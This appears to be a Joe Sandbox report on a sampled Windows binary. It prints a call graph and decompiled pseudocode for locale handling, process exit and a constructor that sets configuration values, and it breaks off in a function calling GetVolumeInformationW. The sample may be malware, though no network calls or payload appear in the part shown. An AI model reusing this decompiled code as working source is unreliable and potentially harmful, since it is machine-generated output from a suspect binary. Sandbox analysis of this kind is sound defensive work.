1315681 21777->21779 21848 12f56a0 25 API calls 2 library calls 21777->21848 21778->21777 21781 12f93f0 79 API calls 21779->21781 21782 1315691 21781->21782 21783 131569d 21782->21783 21784 12f54c0 26 API calls 21782->21784 21785 13156fa 21783->21785 21849 12f56a0 25 API calls 2 library calls 21783->21849 21784->21783 21786 12f93f0 79 API calls 21785->21786 21788 131570a 21786->21788 21789 1315716 21788->21789 21790 12f54c0 26 API calls 21788->21790 21791 1315773 21789->21791 21850 12f56a0 25 API calls 2 library calls 21789->21850 21790->21789 21793 12f93f0 79 API calls 21791->21793 21794 1315783 21793->21794 21795 131578f 21794->21795 21796 12f54c0 26 API calls 21794->21796 21797 13157ec 21795->21797 21851 12f56a0 25 API calls 2 library calls 21795->21851 21796->21795 21799 12f93f0 79 API calls 21797->21799 21800 13157fc 21799->21800 21801 1315808 21800->21801 21802 12f54c0 26 API calls 21800->21802 21803 1315865 21801->21803 21852 12f56a0 25 API calls 2 library calls 21801->21852 21802->21801 21805 12f93f0 79 API calls 21803->21805 21806 1315875 21805->21806 21807 1315881 21806->21807 21808 12f54c0 26 API calls 21806->21808 21809 13158de 21807->21809 21853 12f56a0 25 API calls 2 library calls 21807->21853 21808->21807 21811 12f93f0 79 API calls 21809->21811 21812 13158ee 21811->21812 21813 13158fa 21812->21813 21814 12f54c0 26 API calls 21812->21814 21815 1315957 21813->21815 21854 12f56a0 25 API calls 2 library calls 21813->21854 21814->21813 21817 12f93f0 79 API calls 21815->21817 21818 1315967 21817->21818 21819 1315973 21818->21819 21820 12f54c0 26 API calls 21818->21820 21821 13159d0 21819->21821 21855 12f56a0 25 API calls 2 library calls 21819->21855 21820->21819 21823 12f93f0 79 API calls 21821->21823 21824 13159e0 21823->21824 21825 13159ec 21824->21825 21826 12f54c0 26 API calls 21824->21826 21827 1315a49 21825->21827 21856 12f56a0 25 API calls 2 library calls 21825->21856 21826->21825 21829 12f93f0 79 API calls 21827->21829 21830 1315a59 21829->21830 
21831 1315a65 21830->21831 21832 12f54c0 26 API calls 21830->21832 21833 1315ac2 21831->21833 21857 12f56a0 25 API calls 2 library calls 21831->21857 21832->21831 21834 12f93f0 79 API calls 21833->21834 21836 1315ad2 21834->21836 21837 1315ade 21836->21837 21838 12f54c0 26 API calls 21836->21838 21839 1315b3b 21837->21839 21858 12f56a0 25 API calls 2 library calls 21837->21858 21838->21837 21841 12f93f0 79 API calls 21839->21841 21842 1315b4b 21841->21842 21843 1315b57 21842->21843 21844 12f54c0 26 API calls 21842->21844 21843->21771 21859 12f56a0 25 API calls 2 library calls 21843->21859 21844->21843 21847->21774 21860->20586 21862->20587 22018 132f186 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 22020 131d48d 28 API calls 2 library calls 22023 130ecf0 17 API calls 22027 12fcee0 79 API calls 22031 130ede0 129 API calls 22036 12fcff0 78 API calls __Wcscoll 22037 12f56f0 26 API calls 2 library calls 22041 130eed0 47 API calls 21864 1310ad0 21867 1310b00 21864->21867 21868 1310b14 21867->21868 21870 1310b1b std::_Throw_Cpp_error 21867->21870 21869 1315bf0 26 API calls 21868->21869 21869->21870 21871 1310b36 21870->21871 21879 1308840 21870->21879 21872 1310b85 21871->21872 21894 12f56a0 25 API calls 2 library calls 21871->21894 21875 1310bb4 21872->21875 21895 12f56a0 25 API calls 2 library calls 21872->21895 21876 1310be3 21875->21876 21896 12f56a0 25 API calls 2 library calls 21875->21896 21880 1308885 21879->21880 21881 1308855 PostQueuedCompletionStatus WaitForSingleObject FindCloseChangeNotification 21879->21881 21897 130a810 25 API calls _Maklocstr 21880->21897 21881->21880 21881->21881 21883 1308891 CloseHandle 21898 13091a0 CryptDestroyKey CryptReleaseContext 21883->21898 21885 13088ad 21886 13088c2 21885->21886 21899 12f56a0 25 API calls 2 library calls 21885->21899 21890 1308918 21886->21890 21900 130a810 25 API calls _Maklocstr 21886->21900 21889 1308942 21890->21889 21902 12f56a0 25 API 
calls 2 library calls 21890->21902 21891 13088ea 21901 12f56a0 25 API calls 2 library calls 21891->21901 21897->21883 21898->21885 21900->21891 22043 12fa1c0 82 API calls _Maklocstr 22044 12fb9c0 83 API calls _Maklocstr 22047 131a4de 99 API calls std::_Locinfo::_Locinfo_Addcats 22048 13090c0 16 API calls 22050 130e0c0 82 API calls 2 library calls 22056 12fa2d0 85 API calls _Maklocstr

                          Executed Functions

                          Control-flow Graph (function 135e284; legend: Executed / Not Executed)
                          C-Code - Quality: 69%
                          			E0135E284(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
                          				intOrPtr* _v8;
                          				signed int _v12;
                          				intOrPtr _v40;
                          				signed int _v52;
                          				char _v252;
                          				short _v292;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t33;
                          				short* _t34;
                          				intOrPtr* _t35;
                          				void* _t37;
                          				intOrPtr* _t38;
                          				signed short _t39;
                          				signed short* _t42;
                          				intOrPtr _t45;
                          				void* _t47;
                          				signed int _t50;
                          				void* _t52;
                          				signed int _t56;
                          				void* _t69;
                          				void* _t73;
                          				void* _t74;
                          				void* _t78;
                          				intOrPtr* _t85;
                          				short* _t87;
                          				intOrPtr* _t92;
                          				intOrPtr* _t96;
                          				signed int _t114;
                          				void* _t115;
                          				intOrPtr* _t117;
                          				intOrPtr _t120;
                          				signed int* _t121;
                          				intOrPtr* _t124;
                          				signed short _t126;
                          				int _t128;
                          				void* _t129;
                          				void* _t132;
                          				signed int _t133;
                          
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t85 = _a4;
                          				_push(__edi);
                          				_t33 = E013559E0(__ecx, __edx);
                          				_t114 = 0;
                          				_v12 = 0;
                          				_t3 = _t33 + 0x50; // 0x50
                          				_t124 = _t3;
                          				_t4 = _t124 + 0x250; // 0x2a0
                          				_t34 = _t4;
                          				 *((intOrPtr*)(_t124 + 8)) = 0;
                          				 *_t34 = 0;
                          				_t6 = _t124 + 4; // 0x54
                          				_t117 = _t6;
                          				_v8 = _t34;
                          				_t92 = _t85;
                          				_t35 = _t85 + 0x80;
                          				 *_t124 = _t85;
                          				 *_t117 = _t35;
                          				if( *_t35 != 0) {
                          					E0135E217(0x137d550, 0x16, _t117);
                          					_t92 =  *_t124;
                          					_t132 = _t132 + 0xc;
                          					_t114 = 0;
                          				}
                          				_push(_t124);
                          				if( *_t92 == _t114) {
                          					E0135DB88(_t92); // executed
                          					goto L12;
                          				} else {
                          					if( *((intOrPtr*)( *_t117)) == _t114) {
                          						E0135DCA8();
                          					} else {
                          						E0135DC0F(_t92);
                          					}
                          					if( *((intOrPtr*)(_t124 + 8)) == 0) {
                          						_t78 = E0135E217(0x137d240, 0x40, _t124);
                          						_t132 = _t132 + 0xc;
                          						if(_t78 != 0) {
                          							_push(_t124);
                          							if( *((intOrPtr*)( *_t117)) == 0) {
                          								E0135DCA8();
                          							} else {
                          								E0135DC0F(0);
                          							}
                          							L12:
                          						}
                          					}
                          				}
                          				if( *((intOrPtr*)(_t124 + 8)) == 0) {
                          					L37:
                          					_t37 = 0;
                          					goto L38;
                          				} else {
                          					_t38 = _t85 + 0x100;
                          					if( *_t85 != 0 ||  *_t38 != 0) {
                          						_t39 = E0135E0D4(_t38, _t124);
                          					} else {
                          						_t39 = GetACP();
                          					}
                          					_t126 = _t39;
                          					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
                          						goto L37;
                          					} else {
                          						_t42 = _a8;
                          						if(_t42 != 0) {
                          							 *_t42 = _t126;
                          						}
                          						_t120 = _a12;
                          						if(_t120 == 0) {
                          							L36:
                          							_t37 = 1;
                          							L38:
                          							return _t37;
                          						} else {
                          							_t96 = _v8;
                          							_t15 = _t120 + 0x120; // 0xd0
                          							_t87 = _t15;
                          							 *_t87 = 0;
                          							_t16 = _t96 + 2; // 0x2
                          							_t115 = _t16;
                          							do {
                          								_t45 =  *_t96;
                          								_t96 = _t96 + 2;
                          							} while (_t45 != _v12);
                          							_t18 = (_t96 - _t115 >> 1) + 1; // -1
                          							_t47 = E0135555C(_t87, 0x55, _v8);
                          							_t133 = _t132 + 0x10;
                          							if(_t47 != 0) {
                          								L39:
                          								_push(0);
                          								_push(0);
                          								_push(0);
                          								_push(0);
                          								_push(0);
                          								E013496E7();
                          								asm("int3");
                          								_t131 = _t133;
                          								_t50 =  *0x13a4018; // 0x39cca9f6
                          								_v52 = _t50 ^ _t133;
                          								_push(_t87);
                          								_push(_t126);
                          								_push(_t120);
                          								_t52 = E013559E0(_t98, _t115);
                          								_t88 = _t52;
                          								_t121 =  *(E013559E0(_t98, _t115) + 0x34c);
                          								_t128 = E0135E9BF(_v40);
                          								asm("sbb ecx, ecx");
                          								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
                          								if(_t56 != 0) {
                          									if(E0135B52B(_t121, _t128,  *((intOrPtr*)(_t88 + 0x54)),  &_v252) == 0 && E0135EAF1(_t128) != 0) {
                          										 *_t121 =  *_t121 | 0x00000004;
                          										_t121[2] = _t128;
                          										_t121[1] = _t128;
                          									}
                          								} else {
                          									 *_t121 =  *_t121 & _t56;
                          								}
                          								_pop(_t129);
                          								return E0132EA79(_v12 ^ _t131, _t129);
                          							} else {
                          								if(E0135628F(_t87, 0x1001, _t120, 0x40) == 0) {
                          									goto L37;
                          								} else {
                          									_t20 = _t120 + 0x80; // 0x30
                          									_t87 = _t20;
                          									_t21 = _t120 + 0x120; // 0xd0
                          									if(E0135628F(_t21, 0x1002, _t87, 0x40) == 0) {
                          										goto L37;
                          									} else {
                          										_push(0x5f);
                          										_t69 = E01365367(_t98);
                          										_t98 = _t87;
                          										if(_t69 != 0) {
                          											L31:
                          											_t22 = _t120 + 0x120; // 0xd0
                          											if(E0135628F(_t22, 7, _t87, 0x40) == 0) {
                          												goto L37;
                          											} else {
                          												goto L32;
                          											}
                          										} else {
                          											_push(0x2e);
                          											_t74 = E01365367(_t98);
                          											_t98 = _t87;
                          											if(_t74 == 0) {
                          												L32:
                          												_t120 = _t120 + 0x100;
                          												if(_t126 != 0xfde9) {
                          													E01363434(_t98, _t126, _t120, 0x10, 0xa);
                          													goto L36;
                          												} else {
                          													_push(5);
                          													_t73 = E0135555C(_t120, 0x10, L"utf8");
                          													_t133 = _t133 + 0x10;
                          													if(_t73 != 0) {
                          														goto L39;
                          													} else {
                          														goto L36;
                          													}
                          												}
                          											} else {
                          												goto L31;
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          				}
                          			}

                          APIs
                            • Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
                            • Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83
                          • GetACP.KERNEL32(?,?,?,?,?,?,013540E9,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0135E345
                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,013540E9,?,?,?,00000055,?,-00000050,?,?), ref: 0135E370
                          • _wcschr.LIBVCRUNTIME ref: 0135E404
                          • _wcschr.LIBVCRUNTIME ref: 0135E412
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0135E4D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                          • String ID: utf8
                          • API String ID: 4147378913-905460609
                          • Opcode ID: 3e2dfff00b3550ad24d6f5e9d5ddecd66e2d38702e9c3f8d8bf08d430e207a94
                          • Instruction ID: 56142353c6c126541262ec5690fd862c043b29606fb448b4fdf1ae4c946e3d98
                          • Opcode Fuzzy Hash: 3e2dfff00b3550ad24d6f5e9d5ddecd66e2d38702e9c3f8d8bf08d430e207a94
                          • Instruction Fuzzy Hash: EB711771600206ABEB65AB7DCC41FBAB7A8EF54F48F544439EE05E7181FB74E6408790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph (function 01304E30; graph image not reproduced; legend: Executed / Not Executed)
                          C-Code - Quality: 73%
                          			E01304E30(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                          				char _v8;
                          				char _v16;
                          				intOrPtr* _v20;
                          				intOrPtr* _v24;
                          				char _v28;
                          				char _v32;
                          				char _v48;
                          				char _v52;
                          				char _v56;
                          				char _v72;
                          				char _v76;
                          				char _v80;
                          				char _v96;
                          				char _v100;
                          				char _v104;
                          				char _v120;
                          				intOrPtr _v124;
                          				char _v128;
                          				char _v144;
                          				intOrPtr _v148;
                          				char _v152;
                          				char _v168;
                          				intOrPtr _v172;
                          				char _v176;
                          				char _v192;
                          				intOrPtr _v196;
                          				char _v200;
                          				char _v216;
                          				intOrPtr _v220;
                          				char _v224;
                          				char _v240;
                          				intOrPtr _v244;
                          				char _v248;
                          				char _v264;
                          				intOrPtr _v268;
                          				char _v272;
                          				char _v288;
                          				intOrPtr _v292;
                          				char _v296;
                          				char _v312;
                          				void* __ebx;
                          				void* __edi;
                          				void* __ebp;
                          				signed int _t161;
                          				void* _t171;
                          				char _t173;
                          				void* _t175;
                          				void* _t176;
                          				char _t178;
                          				char _t179;
                          				void* _t181;
                          				void* _t182;
                          				char _t184;
                          				intOrPtr _t185;
                          				void* _t187;
                          				void* _t188;
                          				intOrPtr _t190;
                          				intOrPtr _t191;
                          				void* _t193;
                          				void* _t194;
                          				intOrPtr _t196;
                          				intOrPtr _t197;
                          				void* _t199;
                          				void* _t200;
                          				intOrPtr _t202;
                          				intOrPtr _t203;
                          				void* _t205;
                          				intOrPtr _t207;
                          				void* _t218;
                          				intOrPtr* _t243;
                          				intOrPtr* _t246;
                          				void* _t273;
                          				intOrPtr _t274;
                          				intOrPtr _t276;
                          				intOrPtr _t279;
                          				intOrPtr _t282;
                          				intOrPtr _t285;
                          				intOrPtr _t288;
                          				intOrPtr _t291;
                          				void* _t294;
                          				signed int _t301;
                          				signed int _t303;
                          				intOrPtr* _t313;
                          				signed int _t315;
                          				void* _t316;
                          				intOrPtr* _t318;
                          				void* _t319;
                          				void* _t321;
                          				void* _t323;
                          				void* _t325;
                          				void* _t327;
                          				void* _t329;
                          				void* _t356;
                          
                          				_t273 = __edx;
                          				_push(0xffffffff);
                          				_push(0x13666a0);
                          				_push( *[fs:0x0]);
                          				_push(_t294);
                          				_t161 =  *0x13a4018; // 0x39cca9f6
                          				_push(_t161 ^ _t315);
                          				 *[fs:0x0] =  &_v16;
                          				_t243 = __ecx;
                          				_v20 = __ecx;
                          				_v24 = __ecx;
                          				_push(2);
                          				_t318 = _t316 - 0x120;
                          				_v8 = 0;
                          				_t246 = _t318;
                          				 *_t246 = 0;
                          				 *((intOrPtr*)(_t246 + 4)) = 0;
                          				_t332 = _a8;
                          				if(_a8 != 0) {
                          					asm("lock inc dword [eax+0x4]");
                          				}
                          				 *_t246 = _a4;
                          				 *((intOrPtr*)(_t246 + 4)) = _a8;
                          				E01303AA0(_t243, _t273);
                          				_v8 = 1;
                          				 *_t243 = 0x13969c0;
                          				 *((intOrPtr*)(_t243 + 0x18)) = 0x248a;
                          				E01306180(_t243, _t273, _t294, _t332, _t243 + 0x1c); // executed
                          				_v8 = 2;
                          				 *((intOrPtr*)(_t243 + 0x34)) = 0x170;
                          				 *((intOrPtr*)(_t243 + 0x38)) = 0x3b;
                          				 *((intOrPtr*)(_t243 + 0x3c)) = 0xe;
                          				 *((intOrPtr*)(_t243 + 0x40)) = 0x11e;
                          				 *((intOrPtr*)(_t243 + 0x44)) = 0x15f;
                          				 *((intOrPtr*)(_t243 + 0x48)) = 0x63a;
                          				 *((intOrPtr*)(_t243 + 0x4c)) = 0;
                          				 *((intOrPtr*)(_t243 + 0x50)) = 0;
                          				 *((intOrPtr*)(_t243 + 0x54)) = 0;
                          				 *(_t243 + 0x58) = 0x40;
                          				 *((intOrPtr*)(_t243 + 0x5c)) = 0;
                          				_t295 =  *((intOrPtr*)(_t243 + 0x34));
                          				_t274 =  *0x139699c; // 0x1384458
                          				_t171 = E01304B00(_t243,  &_v48, _t274,  *((intOrPtr*)(_t243 + 0x34)),  *((intOrPtr*)(_t243 + 0x34)));
                          				_v8 = 3;
                          				E01304D70(_t243, _t243 + 0x60, _t171,  *((intOrPtr*)(_t243 + 0x34)), _t295,  *((intOrPtr*)(_t243 + 0x18)));
                          				_t319 = _t318 + 0xc;
                          				_v8 = 5;
                          				_t173 = _v28;
                          				if(_t173 >= 0x10) {
                          					_push(_t173 + 1);
                          					E012F56A0(_t243, _t295, _v48);
                          					_t319 = _t319 + 8;
                          				}
                          				_t296 =  *((intOrPtr*)(_t243 + 0x38));
                          				_t276 =  *0x13969ac; // 0x13845d0
                          				_v32 = 0;
                          				_v28 = 0xf;
                          				_v48 = 0;
                          				_t175 = E01304B00(_t243,  &_v96, _t276,  *((intOrPtr*)(_t243 + 0x38)),  *((intOrPtr*)(_t243 + 0x38)));
                          				_v8 = 6;
                          				_t176 = E01304D70(_t243,  &_v72, _t175,  *((intOrPtr*)(_t243 + 0x38)), _t296,  *((intOrPtr*)(_t243 + 0x18)));
                          				_v8 = 7;
                          				E01304BE0(_t243, _t243 + 0x78, _t176, _t296);
                          				_t321 = _t319 + 0xc;
                          				_t178 = _v52;
                          				if(_t178 >= 0x10) {
                          					_push(_t178 + 1);
                          					E012F56A0(_t243, _t296, _v72);
                          					_t321 = _t321 + 8;
                          				}
                          				_v56 = 0;
                          				_v52 = 0xf;
                          				_v72 = 0;
                          				_v8 = 0xa;
                          				_t179 = _v76;
                          				if(_t179 >= 0x10) {
                          					_push(_t179 + 1);
                          					E012F56A0(_t243, _t296, _v96);
                          					_t321 = _t321 + 8;
                          				}
                          				_t297 =  *((intOrPtr*)(_t243 + 0x3c));
                          				_t279 =  *0x1396990; // 0x1384dd8
                          				_v80 = 0;
                          				_v76 = 0xf;
                          				_v96 = 0;
                          				_t181 = E01304B00(_t243,  &_v144, _t279,  *((intOrPtr*)(_t243 + 0x3c)),  *((intOrPtr*)(_t243 + 0x3c)));
                          				_v8 = 0xb;
                          				_t182 = E01304D70(_t243,  &_v120, _t181,  *((intOrPtr*)(_t243 + 0x3c)), _t297,  *((intOrPtr*)(_t243 + 0x18)));
                          				_v8 = 0xc;
                          				E01304BE0(_t243, _t243 + 0x84, _t182, _t297);
                          				_t323 = _t321 + 0xc;
                          				_t184 = _v100;
                          				if(_t184 >= 0x10) {
                          					_push(_t184 + 1);
                          					E012F56A0(_t243, _t297, _v120);
                          					_t323 = _t323 + 8;
                          				}
                          				_v104 = 0;
                          				_v100 = 0xf;
                          				_v120 = 0;
                          				_v8 = 0xf;
                          				_t185 = _v124;
                          				if(_t185 >= 0x10) {
                          					_push(_t185 + 1);
                          					E012F56A0(_t243, _t297, _v144);
                          					_t323 = _t323 + 8;
                          				}
                          				_t298 =  *((intOrPtr*)(_t243 + 0x40));
                          				_t282 =  *0x13969a0; // 0x13855e0
                          				_v128 = 0;
                          				_v124 = 0xf;
                          				_v144 = 0;
                          				_t187 = E01304B00(_t243,  &_v192, _t282,  *((intOrPtr*)(_t243 + 0x40)),  *((intOrPtr*)(_t243 + 0x40)));
                          				_v8 = 0x10;
                          				_t188 = E01304D70(_t243,  &_v168, _t187,  *((intOrPtr*)(_t243 + 0x40)), _t298,  *((intOrPtr*)(_t243 + 0x18)));
                          				_v8 = 0x11;
                          				E01304BE0(_t243, _t243 + 0x90, _t188, _t298); // executed
                          				_t325 = _t323 + 0xc;
                          				_t190 = _v148;
                          				if(_t190 >= 0x10) {
                          					_push(_t190 + 1);
                          					E012F56A0(_t243, _t298, _v168);
                          					_t325 = _t325 + 8;
                          				}
                          				_v152 = 0;
                          				_v148 = 0xf;
                          				_v168 = 0;
                          				_v8 = 0x14;
                          				_t191 = _v172;
                          				if(_t191 >= 0x10) {
                          					_push(_t191 + 1);
                          					E012F56A0(_t243, _t298, _v192);
                          					_t325 = _t325 + 8;
                          				}
                          				_t299 =  *((intOrPtr*)(_t243 + 0x44));
                          				_t285 =  *0x13969a8; // 0x1385de8
                          				_v176 = 0;
                          				_v172 = 0xf;
                          				_v192 = 0;
                          				_t193 = E01304B00(_t243,  &_v240, _t285,  *((intOrPtr*)(_t243 + 0x44)),  *((intOrPtr*)(_t243 + 0x44)));
                          				_v8 = 0x15;
                          				_t194 = E01304D70(_t243,  &_v216, _t193,  *((intOrPtr*)(_t243 + 0x44)), _t299,  *((intOrPtr*)(_t243 + 0x18)));
                          				_v8 = 0x16;
                          				E01304BE0(_t243, _t243 + 0x9c, _t194, _t299);
                          				_t327 = _t325 + 0xc;
                          				_t196 = _v196;
                          				if(_t196 >= 0x10) {
                          					_push(_t196 + 1);
                          					E012F56A0(_t243, _t299, _v216);
                          					_t327 = _t327 + 8;
                          				}
                          				_v200 = 0;
                          				_v196 = 0xf;
                          				_v216 = 0;
                          				_v8 = 0x19;
                          				_t197 = _v220;
                          				if(_t197 >= 0x10) {
                          					_push(_t197 + 1);
                          					E012F56A0(_t243, _t299, _v240);
                          					_t327 = _t327 + 8;
                          				}
                          				_t300 =  *((intOrPtr*)(_t243 + 0x5c));
                          				_t288 =  *0x13969b4; // 0x1396090
                          				_v224 = 0;
                          				_v220 = 0xf;
                          				_v240 = 0;
                          				_t199 = E01304B00(_t243,  &_v288, _t288,  *((intOrPtr*)(_t243 + 0x5c)),  *((intOrPtr*)(_t243 + 0x5c)));
                          				_v8 = 0x1a;
                          				_t200 = E01304D70(_t243,  &_v264, _t199,  *((intOrPtr*)(_t243 + 0x5c)), _t300,  *((intOrPtr*)(_t243 + 0x18)));
                          				_v8 = 0x1b;
                          				E01304BE0(_t243, _t243 + 0xa8, _t200, _t300);
                          				_t329 = _t327 + 0xc;
                          				_t202 = _v244;
                          				if(_t202 >= 0x10) {
                          					_push(_t202 + 1);
                          					E012F56A0(_t243, _t300, _v264);
                          					_t329 = _t329 + 8;
                          				}
                          				_v248 = 0;
                          				_v244 = 0xf;
                          				_v264 = 0;
                          				_v8 = 0x1e;
                          				_t203 = _v268;
                          				if(_t203 >= 0x10) {
                          					_push(_t203 + 1);
                          					E012F56A0(_t243, _t300, _v288);
                          					_t329 = _t329 + 8;
                          				}
                          				_t301 =  *(_t243 + 0x58);
                          				_t291 =  *0x13969a4; // 0x13865f0
                          				_v272 = 0;
                          				_v268 = 0xf;
                          				_v288 = 0;
                          				_t205 = E01304B00(_t243,  &_v312, _t291, _t301,  *(_t243 + 0x58));
                          				_v8 = 0x1f;
                          				_t292 = _t205;
                          				E01304D70(_t243, _t243 + 0xb4, _t205, _t301, _t301,  *((intOrPtr*)(_t243 + 0x18)));
                          				_v8 = 0x21;
                          				_t207 = _v292;
                          				if(_t207 >= 0x10) {
                          					_t218 = _t207 + 1;
                          					_t356 = _t218;
                          					_push(_t218);
                          					E012F56A0(_t243, _t301, _v312);
                          				}
                          				_v296 = 0;
                          				_v292 = 0xf;
                          				_v312 = 0;
                          				 *((intOrPtr*)(_t243 + 0xcc)) = 0xa;
                          				 *((intOrPtr*)(_t243 + 0xd0)) = 0xa68;
                          				 *((intOrPtr*)(_t243 + 0xd4)) = 0xfeadbeef;
                          				 *((intOrPtr*)(_t243 + 0xd8)) = 1;
                          				 *((intOrPtr*)(_t243 + 0xdc)) = 0x28;
                          				 *((intOrPtr*)(_t243 + 0xe0)) = 1;
                          				 *((intOrPtr*)(_t243 + 0xe4)) = 0x64;
                          				 *((intOrPtr*)(_t243 + 0xe8)) = 0xa;
                          				 *((intOrPtr*)(_t243 + 0xec)) = 5;
                          				E013060B0(_t243, _t292, _t301, _t356, _t243 + 0xf0);
                          				_v8 = 0x22;
                          				E01305C80(_t243, _t243, _t292, _t301, _t356, _t243 + 0x108); // executed
                          				_v8 = 0x23;
                          				E01305700(_t243);
                          				_t313 = _a8;
                          				if(_t313 != 0) {
                          					_t303 = _t301 | 0xffffffff;
                          					asm("lock xadd [esi+0x4], eax");
                          					if(_t303 == 0) {
                          						 *((intOrPtr*)( *_t313))();
                          						asm("lock xadd [esi+0x8], edi");
                          						if(_t303 == 1) {
                          							 *((intOrPtr*)( *_t313 + 4))();
                          						}
                          					}
                          				}
                          				 *[fs:0x0] = _v16;
                          				return _t243;
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID:
                          • String ID: #$($;$@$d$h
                          • API String ID: 0-3205887084
                          • Opcode ID: 6e34ed39cc5010f09b2d552e0576b1bd8c219f4a360c4eee76c96628ea0a3b5f
                          • Instruction ID: a8e21576c5cfd85f17522ae0323edaebb8be7999087d8dfa4e75567639c9b445
                          • Opcode Fuzzy Hash: 6e34ed39cc5010f09b2d552e0576b1bd8c219f4a360c4eee76c96628ea0a3b5f
                          • Instruction Fuzzy Hash: B1F1CEB0801245DFEB11DF58D894B9EBBF5AF21308F5440A8D948AB382D7759E88CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 100%
                          			E01352C19(int _a4) {
                          				void* _t14;
                          
                          				if(E013565EF(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                          					TerminateProcess(GetCurrentProcess(), _a4);
                          				}
                          				E01352C5B(_t14, _a4);
                          				ExitProcess(_a4);
                          			}

                          APIs
                          • GetCurrentProcess.KERNEL32(?,?,01352C18,?,?,?,?), ref: 01352C3B
                          • TerminateProcess.KERNEL32(00000000,?,01352C18,?,?,?,?), ref: 01352C42
                          • ExitProcess.KERNEL32 ref: 01352C54
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 3d962f33edff6a28c8a5a666ca2ff3c7ceeafec5eafd3c358a100c98313d1f4b
                          • Instruction ID: 408b7175f01bf791533e7072edc39a2d90e8429a30305452012f79b99c96dde5
                          • Opcode Fuzzy Hash: 3d962f33edff6a28c8a5a666ca2ff3c7ceeafec5eafd3c358a100c98313d1f4b
                          • Instruction Fuzzy Hash: 31E0B631240148EFCF667FA8E949D4A3F6DEB61B4AF404414F90586126CB35E982CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 512 1306180-1306285 call 12f51b0 * 2 GetVolumeInformationW call 12f8010 519 13062c0-13062e2 512->519 520 1306287-130628a 512->520 522 13062e4-13062f4 call 12f56a0 519->522 523 13062f7-13062fd 519->523 521 1306290-1306299 520->521 524 13062b2-13062b8 521->524 525 130629b-13062ad call 12fc140 521->525 522->523 527 1306312-130632f call 132ea79 523->527 528 13062ff-130630f call 12f56a0 523->528 524->521 530 13062ba-13062bd 524->530 525->524 528->527 530->519
                          C-Code - Quality: 49%
                          			E01306180(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __eflags, signed short* _a4) {
                          				WCHAR* _v8;
                          				char _v16;
                          				signed int _v20;
                          				long _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				intOrPtr _v36;
                          				char _v40;
                          				char _v48;
                          				signed int _v52;
                          				WCHAR* _v56;
                          				char _v72;
                          				intOrPtr _v76;
                          				WCHAR* _v80;
                          				char _v96;
                          				signed short* _v100;
                          				signed short* _v104;
                          				void* __esi;
